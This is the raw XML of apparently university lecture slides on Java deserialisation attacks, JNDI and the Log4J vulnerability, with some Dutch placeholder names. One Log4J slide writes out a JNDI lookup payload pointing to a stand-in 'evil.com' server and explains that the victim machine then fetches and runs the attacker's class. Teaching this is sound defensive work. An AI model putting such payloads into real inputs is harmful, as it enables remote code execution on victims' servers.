                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC9521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9097D16C-212F-431B-BE46-E7162F9AF926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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249719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C2CAA-3D0F-FDC7-4A62-E7CB065AA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542469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0" err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2646" dirty="0"/>
              <a:t> Java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EAB0B-C6AB-56D5-EDFC-754FECF0B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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B060602020203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</a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("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/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tmp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/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students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);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        s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.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readObject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(); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="240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None/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-GB" sz="18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en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t we only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/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objects?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subtle issue: only after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do we know that type of object   we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised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GB" sz="1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defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look-Ahead Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill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to white-list which classes are allowed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="818954" lvl="1" indent="-314982" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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endParaRPr lang="en-GB" sz="1984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defTabSz="542469">
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1984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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC9521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9097D16C-212F-431B-BE46-E7162F9AF926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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408459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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB8E39A-D565-0FEE-4BB2-37EB77D05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Log4J attack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B48D8E-6A84-C4B2-C149-96589B1D2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endParaRPr lang="en-GB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endParaRPr lang="en-GB" sz="1764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r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chvancooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, https://twitter.com/chvancooten/status/1469340927923826691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93188" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B015F0-4A09-2CC7-7F61-0E3FEE370F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E43263B4-33DF-4CFA-9BD7-953625D303B5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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93189" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C6110-6D77-BCAA-BFCB-24A3C3CC3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1150938"/>
            <a:ext cx="3516313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Afbeelding 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354FDFCB-144A-4E78-F5EA-B974782BF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4878388"/>
            <a:ext cx="5283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1" name="Afbeelding 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832D15B1-BCB3-CB3A-ABB0-7FE1F32911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1398588"/>
            <a:ext cx="5113338" cy="206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89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078F5590-5FDB-3205-7194-A13AF95A7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JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2205"/>
              <a:t>(Java Naming and Directory Interface)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055DEB-FB5E-B829-1194-380CBCC3F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GB" sz="1800" dirty="0"/>
              <a:t>Common interface to interact with a variety of naming and directory services, incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORBA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naming service </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>associates names with values aka bindings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>provides lookup and search operations of objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>special type of naming service for storing directory objects that can have attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in Naming or Directory service using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. store byte representation of object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JNDI references, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. tell where to fetch the object </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rmi://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ldap://server.com/reference</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="566968" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Another option is to let a JDNI reference point to a (remote) factory class to create the object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94212" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82663BF7-6496-E64C-0389-EE5EBEFC32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97F6D133-7A38-4DB0-9EBB-7FFE3DDAF961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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26355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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4F94BC-F2E2-F1D0-6F5F-83F21B7B4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Log4J attack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7B58EA-638D-61AA-42E0-89CDAF9A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en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker provides some input that is a JDNI lookup pointing to their own server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://evil.com/ref}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>If that user input is logged, Log4j will retrieve the corresponding object from the attacker’s server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker’s server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t> can reply with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>a serialised object, which will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0" err="1"/>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1984" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>a JNDI reference to another server hosting the class; JDNI looks up that reference, and downloads &amp; executes class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="440975">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1984" dirty="0"/>
              <a:t>Attacker’s code runs on the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="125993" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t>Alternatively, attacker can abuse gadgets available on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1"/>
              <a:t>ClassPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0"/>
              <a:t> on the victim’s machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="503972" lvl="1" indent="0">
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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 lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95236" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEC7382F-6DCE-EC8F-C2A2-83C6E87810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BF3F69A1-0589-43B5-975A-C4F31B7C5761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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31251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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51075B6A-B833-1494-02AB-608E75188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data exfiltration using Log4J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AB7C84-5C4F-CCE8-C00B-69D2EF5AA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230313"/>
